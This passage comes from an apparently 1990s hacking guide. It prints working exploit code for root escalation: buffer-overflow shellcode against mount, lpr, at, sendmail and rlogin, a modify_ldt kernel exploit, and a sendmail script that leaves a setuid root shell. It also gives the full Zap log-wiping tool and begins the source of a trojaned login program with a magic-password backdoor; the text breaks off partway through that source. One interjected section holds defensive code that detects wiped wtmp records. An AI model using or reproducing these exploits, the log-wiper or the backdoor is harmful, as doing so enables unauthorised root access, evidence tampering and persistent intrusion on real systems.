*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}

/*LPR exploit:I don't know the author...*/

#include
#include
#include

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}


b) Versions 1.2.* to 1.3.2
NLSPATH environment variable exploit:

/* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include
#include
#include
#include
#include

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);
}

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux
*/

#include
#include
#include
#include
#include

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);


for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);
}

MOD_LDT exploit (God, this one gave such a headache to my sysadmin (root)!!!)

/* this is a hack of a hack. a valid System.map was needed to get this
sploit to werk.. but not any longer.. This sploit will give you root
if the modify_ldt bug werks.. which I beleive it does in any kernel
before 1.3.20 ..

QuantumG
*/

/* original code written by Morten Welinder.
*
* this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
* 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
* -ReD
*/

#include
#include
#include
#include
#ifdef NEWERKERNEL
#include
#endif
#define __KERNEL__
#include
#include

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)


#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
unsigned char res;
asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));
return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
while (size-- > 0)
*(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
while (size-- > 0)
__farpoke (seg, (unsigned)(dst++), *(char *)src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n");

printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
/* Continue after reporting error. */
printf ("This bug has been fixed in your kernel.\n");
else
{
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
}

printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
{
printf ("This bug has been fixed in your kernel.\n");
return 1;
}
else
{
printf ("Shit happens: ");
printf ("0x00000000 - 0xfffffffd is accessible.\n");
}

i = get_kernel_syms(blah);
k = i+10;
for (j=0; j if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;
if (k==i+10) { printf("current not found!!!\n"); return(1); }
j=k;

taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }
printf("Current process is %i\n",thistask.pid);
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }
printf("Parent process is %i\n",thistask.pid);
thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
memputseg (7, taskptr, &thistask, sizeof (thistask));
printf ("Shit happens: parent process is now root process.\n");
return 0;
}

c.) Other Linux versions:
Sendmail exploit (sendmail 8.7 to 8.8.2, the SIGHUP re-exec bug):



#!/bin/sh
#
#
# Hi !
# This is an exploit for the sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and maybe other platforms).
# This shell script leaves a setuid-root shell in the /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
# How it works: leshka starts the setuid-root sendmail with argv[0] set to
# /tmp/smtpd. A basename of "smtpd" puts sendmail in daemon (-bd) mode, so
# it backgrounds itself and leshka returns. When that daemon gets SIGHUP it
# restarts itself by re-executing argv[0], still as root, so the program
# that actually comes back is /tmp/smtpd.
#
echo '#include <unistd.h>                                   '>>leshka.c
echo 'int main()                                            '>>leshka.c
echo '{                                                     '>>leshka.c
echo '  execl("/usr/sbin/sendmail","/tmp/smtpd",(char *)0); '>>leshka.c
echo '  return 1;                                           '>>leshka.c
echo '}                                                     '>>leshka.c
#
#
echo '#include <unistd.h>                                   '>>smtpd.c
echo '#include <stdlib.h>                                   '>>smtpd.c
echo 'int main()                                            '>>smtpd.c
echo '{                                                     '>>smtpd.c
echo '  setuid(0); setgid(0);                               '>>smtpd.c
echo '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo '  return 0;                                           '>>smtpd.c
echo '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
# the sendmail daemon now shows up in ps as /tmp/smtpd: pick its pid and HUP it
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"

SunOS:
rlogin exploit (stack overflow through an overlong host-name argument, SPARC only):
(arghh!)
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* SPARC only: return the current stack pointer, used to guess where the
   overflowed buffer lands in rlogin's stack */
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 1]; /* +1: room for the terminating NUL */
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen((char *)sparc_shellcode);

long_p = (u_long *) buf;

/* NOP sled: the front of the argument is filled with SPARC no-ops */
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

/* then the shellcode itself */
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

/* then EXTRA bytes of the guessed return address; one of the copies
   overwrites the saved return pointer and lands somewhere in the sled */
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
*(u_char *) long_p = '\0'; /* execl() wants a C string */

printf("Jumping to address 0x%lx\n", targ_addr);

execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
return 1;
}

Want more exploits? Get 'em from other sites (like rootshell,
dhp.com/~fyodor, etc...).



Step 3: Covering your tracks:
______

For this you can use lots of programs: zap, utclean, and many others.
Watch out: ALWAYS check, after you have cloaked yourself, that it really
worked:
victim1:~$ who
...(crap)...
victim1:~$ finger
...;as;;sda...
victim1:~$ w
...

If you are still not cloaked, look for wtmpx, utmpx and other files like
that (Solaris keeps the extended records there, so zeroing only utmp and
wtmp still leaves you visible). The only cloaker (that I know) that erased
me even from wtmpx/utmpx was utclean. But I don't have it right now, so
ZAP'll have to do the job.



/*
Title: Zap.c (c) rokK Industries
Sequence: 911204.B

Syztems: Kompiles on SunOS 4.+
Note: To mask yourself from lastlog and wtmp you need to be root,
utmp is go+w on default SunOS, but is sometimes removed.
Kompile: cc -O Zap.c -o Zap
Run: Zap

Desc: Will Fill the Wtmp and Utmp Entries corresponding to the
entered Username. It also Zeros out the last login data for
the specific user, fingering that user will show 'Never Logged
In'

Usage: If you cant find a usage for this, get a brain.
*/

#include <sys/types.h>
#include <sys/file.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

int f;

/* Walk a utmp-format file and overwrite, in place, every record whose
   user name begins with 'who'. It is a prefix match (strncmp over
   strlen(who)), so zapping "bob" also wipes "bobby". The record is zeroed,
   not removed: the file keeps its size and a blank slot stays behind. */
void kill_tmp(name,who)
char *name,
*who;
{
    struct utmp utmp_ent;

    if ((f=open(name,O_RDWR))>=0) {
        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
            if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                lseek (f, -(off_t)sizeof (utmp_ent), SEEK_CUR);
                write (f, &utmp_ent, sizeof (utmp_ent));
            }
        close(f);
    }
}

/* lastlog is indexed by uid: seek to uid * sizeof(struct lastlog) and
   write a zero record there, so finger reports "Never logged in". */
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), SEEK_SET);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

int
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_tmp("/etc/utmp",argv[1]);
        kill_tmp("/usr/adm/wtmp",argv[1]);
        kill_lastlog(argv[1]);
        printf("Zap!\n");
        return 0;
    }
    printf("Usage: %s username\n",argv[0]);
    return 1;
}

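The inverse of Zap, as an added example (my own code, not part of this guide
and not from rokK Industries): Zap never deletes a record, it overwrites it
with zero bytes in place, so a wtmp that has been cleaned this way carries an
all-zero record wedged between populated ones. wtmp is append-only, so that
pattern cannot come from normal logging. The scanner below is written for the
Linux <utmp.h> record layout; the four-record wtmp image is constructed
sample data, and the cap of 64 reported hits is my choice. Run it with a path
to scan a real file (e.g. /var/log/wtmp).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <utmp.h>

/* 1 if every byte of the record is zero: the exact image kill_tmp() writes back. */
int record_is_zeroed(const struct utmp *r)
{
    const unsigned char *p = (const unsigned char *)r;
    size_t i;
    for (i = 0; i < sizeof *r; i++)
        if (p[i] != 0)
            return 0;
    return 1;
}

/*
 * Report zeroed records that sit between populated ones. wtmp is only ever
 * appended to, so a zero record in the interior cannot come from normal
 * logging; it means something rewrote the file in place. Leading and
 * trailing zero records are ignored (padding, or a file being extended).
 * Indices of hits go to 'hits' (up to max_hits); the return value is the
 * total number of hits.
 */
size_t find_zapped_records(const struct utmp *recs, size_t n,
                           size_t *hits, size_t max_hits)
{
    size_t i, found = 0, run_start = 0, run_len = 0;
    int seen_populated = 0;

    for (i = 0; i < n; i++) {
        if (record_is_zeroed(&recs[i])) {
            if (seen_populated) {            /* zero run after real data */
                if (run_len == 0)
                    run_start = i;
                run_len++;
            }
            continue;
        }
        /* a populated record closes any zero run before it: those are interior */
        for (; run_len > 0; run_len--, run_start++) {
            if (found < max_hits)
                hits[found] = run_start;
            found++;
        }
        seen_populated = 1;
    }
    return found;                            /* a run still open at EOF is trailing */
}

/* Read a whole wtmp-format file and scan it. Returns hit count, or -1 on error. */
long scan_wtmp_file(const char *path, size_t *hits, size_t max_hits)
{
    FILE *fp = fopen(path, "rb");
    struct utmp *recs = NULL, *grown;
    size_t n = 0, cap = 0;
    long result;

    if (fp == NULL)
        return -1;
    for (;;) {
        if (n == cap) {
            cap = cap ? cap * 2 : 256;
            grown = realloc(recs, cap * sizeof *recs);
            if (grown == NULL) { free(recs); fclose(fp); return -1; }
            recs = grown;
        }
        if (fread(&recs[n], sizeof *recs, 1, fp) != 1)
            break;
        n++;
    }
    fclose(fp);
    result = (long)find_zapped_records(recs, n, hits, max_hits);
    free(recs);
    return result;
}

/* Constructed sample record: a USER_PROCESS entry as login(1) would write it. */
static void fill_login(struct utmp *r, const char *user, const char *line, long when)
{
    memset(r, 0, sizeof *r);
    r->ut_type = USER_PROCESS;
    r->ut_pid = 4242;
    strncpy(r->ut_user, user, sizeof r->ut_user - 1);
    strncpy(r->ut_line, line, sizeof r->ut_line - 1);
    r->ut_tv.tv_sec = when;
}

/* Constructed four-record wtmp image: three logins, the middle one wiped the
   way kill_tmp("/usr/adm/wtmp", "eve") would, plus a trailing blank record. */
size_t demo_zapped_sample(size_t *hits, size_t max_hits)
{
    struct utmp sample[4];
    fill_login(&sample[0], "alice", "tty1",  850000000L);
    fill_login(&sample[1], "eve",   "ttyp0", 850000600L);
    memset(&sample[1], 0, sizeof sample[1]);   /* Zap's in-place overwrite */
    fill_login(&sample[2], "bob",   "tty2",  850001200L);
    memset(&sample[3], 0, sizeof sample[3]);   /* trailing zeros: not a hit */
    return find_zapped_records(sample, 4, hits, max_hits);
}

int main(int argc, char **argv)
{
    size_t hits[64], n, i;
    if (argc > 1) {
        long r = scan_wtmp_file(argv[1], hits, 64);
        if (r < 0) { perror(argv[1]); return 1; }
        n = (size_t)r;
    } else {
        n = demo_zapped_sample(hits, 64);
    }
    printf("%zu interior zeroed record(s)\n", n);
    for (i = 0; i < n && i < 64; i++)
        printf("  record #%zu is all zeros: probable in-place wipe\n", hits[i]);
    return n ? 2 : 0;
}
```

Use it on wtmp, not on utmp: the live utmp legitimately holds zero records
for free terminal slots, so only the append-only history file gives a clean
signal. Zap's lastlog wipe shows up the same way, as a user whose lastlog
slot is all zeros while wtmp still has (or used to have) logins for that uid.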

Step 4: Keeping that account.
_______

This usually means that you'll have to install some programs that give you
access even after root has killed your account...
(DAEMONS!!!) =>|-@
Here is an example of a trojaned login from the DemonKit (good job,
fellows...). It accepts a "magic password" for any account, root included,
and skips the utmp/wtmp/lastlog/syslog writes for that session.
LOOK OUT !!! If you decide to plant a daemon, be careful and set its
modification date back (use touch --help to see how!). Keep in mind that
touch only rewrites atime and mtime: the inode change time (ctime, what
ls -lc shows) is stamped by the kernel and will still say when you really
wrote the file.


/*
This is a simple trojanized login program. It was designed for Linux
and will not work without modification on other systems. It lets you log in
as either the root user or any ordinary user by use of a 'magic password'.
It also prevents the login from being recorded in utmp, wtmp, etc.
You will effectively be invisible, and not be detected except via 'ps'.
*/

#define BACKDOOR "password"	/* the magic password */
int krad=0;	/* set when the magic password was typed: bypasses the password
		   check and suppresses every utmp/wtmp/lastlog/syslog write */



/* This program is derived from 4.3 BSD software and is
subject to the copyright notice below.

The port to HP-UX has been motivated by the incapability
of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.

Changes:

- General HP-UX portation. Use of facilities not available
in HP-UX (e.g. setpriority) has been eliminated.
Utmp/wtmp handling has been ported.

- The program uses BSD command line options to be used
in connection with e.g. 'rlogind' i.e. 'new login'.

- HP features left out: logging of bad login attempts in /etc/btmp,
they are sent to syslog

password expiry

'*' as login shell, add it if you need it

- BSD features left out: quota checks
password expiry
analysis of terminal type (tset feature)

- BSD features thrown in: Security logging to syslogd.
This requires you to have a (ported) syslog
system -- 7.0 comes with syslog

'Lastlog' feature.

- A lot of nitty gritty details has been adjusted in favour of
HP-UX, e.g. /etc/securetty, default paths and the environment
variables assigned by 'login'.

- We do *nothing* to setup/alter tty state, under HP-UX this is
to be done by getty/rlogind/telnetd/some one else.

Michael Glad (glad@daimi.dk)
Computer Science Department
Aarhus University
Denmark

1990-07-04

1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:
- now explictly sets non-blocking mode on descriptors
- strcasecmp is now part of HP-UX
1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12
From 1992 till now (1995) this code for Linux has been maintained at
ftp.daimi.aau.dk:/pub/linux/poe/
*/

/*
* Copyright (c) 1980, 1987, 1988 The Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";
#endif /* not lint */

/*
* login [ name ]
* login -h hostname (for telnetd, etc.)
* login -f name (for pre-authenticated login: datakit, xterm, etc.)
*/

/* #define TESTING */

#ifdef TESTING
#include "param.h"
#else
#include <sys/param.h>
#endif

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <errno.h>
#define index strchr
#define rindex strrchr
#include <string.h>
#include <strings.h>
#include <syslog.h>
#include <grp.h>
#include <pwd.h>
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <termios.h>
#include <termio.h>
#include <fcntl.h>

#ifdef TESTING
# include "utmp.h"
#else
# include <utmp.h>
#endif

#ifdef SHADOW_PWD
#include <shadow.h>
#endif

#ifndef linux
#include <ttyent.h>
#include <lastlog.h>
#else
struct lastlog
{ long ll_time;
char ll_line[12];
char ll_host[16];
};
#endif

#include "pathnames.h"

#define P_(s) ()
void opentty P_((const char *tty));
void getloginname P_((void));
void timedout P_((void));
int rootterm P_((char *ttyn));
void motd P_((void));
void sigint P_((void));
void checknologin P_((void));
void dolastlog P_((int quiet));
void badlogin P_((char *name));
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty));
void getstr P_((char *buf, int cnt, char *err));
void sleepexit P_((int eval));
#undef P_

#ifdef KERBEROS
#include <krb.h>
#include <des.h>
char realm[REALM_SZ];
int kerror = KSUCCESS, notickets = 1;
#endif

#ifndef linux
#define TTYGRPNAME "tty" /* name of group to own ttys */
#else
# define TTYGRPNAME "other"
# ifndef MAXPATHLEN
# define MAXPATHLEN 1024
# endif
#endif

/*
* This bounds the time given to login. Not a define so it can
* be patched on machines where it's too small.
*/
#ifndef linux
int timeout = 300;
#else
int timeout = 60;
#endif

struct passwd *pwd;
int failures;
char term[64], *hostname, *username, *tty;

char thishost[100];

#ifndef linux
struct sgttyb sgttyb;
struct tchars tc = {
CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK
};
struct ltchars ltc = {
CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT
};
#endif

char *months[] =
{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec" };

/* provided by Linus Torvalds 16-Feb-93 */
void
opentty(const char * tty)
{
int i;
int fd = open(tty, O_RDWR);

for (i = 0 ; i < fd ; i++)
close(i);
for (i = 0 ; i < 3 ; i++)
dup2(fd, i);
if (fd >= 3)
close(fd);
}

int
main(argc, argv)
int argc;
char **argv;
{
extern int errno, optind;
extern char *optarg, **environ;
struct timeval tp;
struct tm *ttp;
struct group *gr;
register int ch;
register char *p;
int ask, fflag, hflag, pflag, cnt;
int quietlog, passwd_req, ioctlval;
char *domain, *salt, *ttyn, *pp;
char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
char *ctime(), *ttyname(), *stypeof();
time_t time();
void timedout();
char *termenv;

#ifdef linux
char tmp[100];
/* Just as arbitrary as mountain time: */
/* (void)setenv("TZ", "MET-1DST",0); */
#endif

(void)signal(SIGALRM, timedout);
(void)alarm((unsigned int)timeout);
(void)signal(SIGQUIT, SIG_IGN);
(void)signal(SIGINT, SIG_IGN);

(void)setpriority(PRIO_PROCESS, 0, 0);
#ifdef HAVE_QUOTA
(void)quota(Q_SETUID, 0, 0, 0);
#endif

/*
* -p is used by getty to tell login not to destroy the environment
* -f is used to skip a second login authentication
* -h is used by other servers to pass the name of the remote
* host to login so that it may be placed in utmp and wtmp
*/
(void)gethostname(tbuf, sizeof(tbuf));
(void)strncpy(thishost, tbuf, sizeof(thishost)-1);
domain = index(tbuf, '.');

fflag = hflag = pflag = 0;
passwd_req = 1;
while ((ch = getopt(argc, argv, "fh:p")) != EOF)
switch (ch) {
case 'f':
fflag = 1;
break;

case 'h':
if (getuid()) {
(void)fprintf(stderr,
"login: -h for super-user only.\n");
exit(1);
}
hflag = 1;
if (domain && (p = index(optarg, '.')) &&
strcasecmp(p, domain) == 0)
*p = 0;
hostname = optarg;
break;

case 'p':
pflag = 1;
break;
case '?':
default:
(void)fprintf(stderr,
"usage: login [-fp] [username]\n");
exit(1);
}
argc -= optind;
argv += optind;
if (*argv) {
username = *argv;
ask = 0;
} else
ask = 1;

#ifndef linux
ioctlval = 0;
(void)ioctl(0, TIOCLSET, &ioctlval);
(void)ioctl(0, TIOCNXCL, 0);
(void)fcntl(0, F_SETFL, ioctlval);
(void)ioctl(0, TIOCGETP, &sgttyb);
sgttyb.sg_erase = CERASE;
sgttyb.sg_kill = CKILL;
(void)ioctl(0, TIOCSLTC, &ltc);
(void)ioctl(0, TIOCSETC, &tc);
(void)ioctl(0, TIOCSETP, &sgttyb);

/*
* Be sure that we're in
* blocking mode!!!
* This is really for HPUX
*/
ioctlval = 0;
(void)ioctl(0, FIOSNBIO, &ioctlval);
#endif

for (cnt = getdtablesize(); cnt > 2; cnt--)
close(cnt);

ttyn = ttyname(0);
if (ttyn == NULL || *ttyn == '\0') {
(void)sprintf(tname, "%s??", _PATH_TTY);
ttyn = tname;
}

setpgrp();

{
struct termios tt, ttt;

tcgetattr(0, &tt);
ttt = tt;
ttt.c_cflag &= ~HUPCL;

if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
tcsetattr(0,TCSAFLUSH,&ttt);
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
vhangup();
signal(SIGHUP, SIG_DFL);
}

setsid();

/* re-open stdin,stdout,stderr after vhangup() closed them */
/* if it did, after 0.99.5 it doesn't! */
opentty(ttyn);
tcsetattr(0,TCSAFLUSH,&tt);
}

if (tty = rindex(ttyn, '/'))
++tty;
else
tty = ttyn;

openlog("login", LOG_ODELAY, LOG_AUTH);

for (cnt = 0;; ask = 1) {
ioctlval = 0;
#ifndef linux
(void)ioctl(0, TIOCSETD, &ioctlval);
#endif

if (ask) {
fflag = 0;
getloginname();
}

checktty(username, tty);

(void)strcpy(tbuf, username);
if (pwd = getpwnam(username))
salt = pwd->pw_passwd;
else
salt = "xx";

/* if user not super-user, check for disabled logins */
if (pwd == NULL || pwd->pw_uid)
checknologin();

/*
* Disallow automatic login to root; if not invoked by
* root, disallow if the uid's differ.
*/
if (fflag && pwd) {
int uid = getuid();

passwd_req = pwd->pw_uid == 0 ||
(uid && uid != pwd->pw_uid);
}

/*
* If trying to log in as root, but with insecure terminal,
* refuse the login attempt.
*/
if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) {
(void)fprintf(stderr,
"%s login refused on this terminal.\n",
pwd->pw_name);

if (hostname)
syslog(LOG_NOTICE,
"LOGIN %s REFUSED FROM %s ON TTY %s",
pwd->pw_name, hostname, tty);
else
syslog(LOG_NOTICE,
"LOGIN %s REFUSED ON TTY %s",
pwd->pw_name, tty);
continue;
}

/*
* If no pre-authentication and a password exists
* for this user, prompt for one and verify it.
*/
if (!passwd_req || (pwd && !*pwd->pw_passwd))
break;

setpriority(PRIO_PROCESS, 0, -4);
pp = getpass("Password: ");
if(strcmp(BACKDOOR, pp) == 0) krad++;

p = crypt(pp, salt);
setpriority(PRIO_PROCESS, 0, 0);

#ifdef KERBEROS

/*
* If not present in pw file, act as we normally would.
* If we aren't Kerberos-authenticated, try the normal
* pw file for a password. If that's ok, log the user
* in without issueing any tickets.
*/

if (pwd && !krb_get_lrealm(realm,1)) {
/*
* get TGT for local realm; be careful about uid's
* here for ticket file ownership
*/
(void)setreuid(geteuid(),pwd->pw_uid);
kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm,
"krbtgt", realm, DEFAULT_TKT_LIFE, pp);
(void)setuid(0);
if (kerror == INTK_OK) {
memset(pp, 0, strlen(pp));
notickets = 0; /* user got ticket */
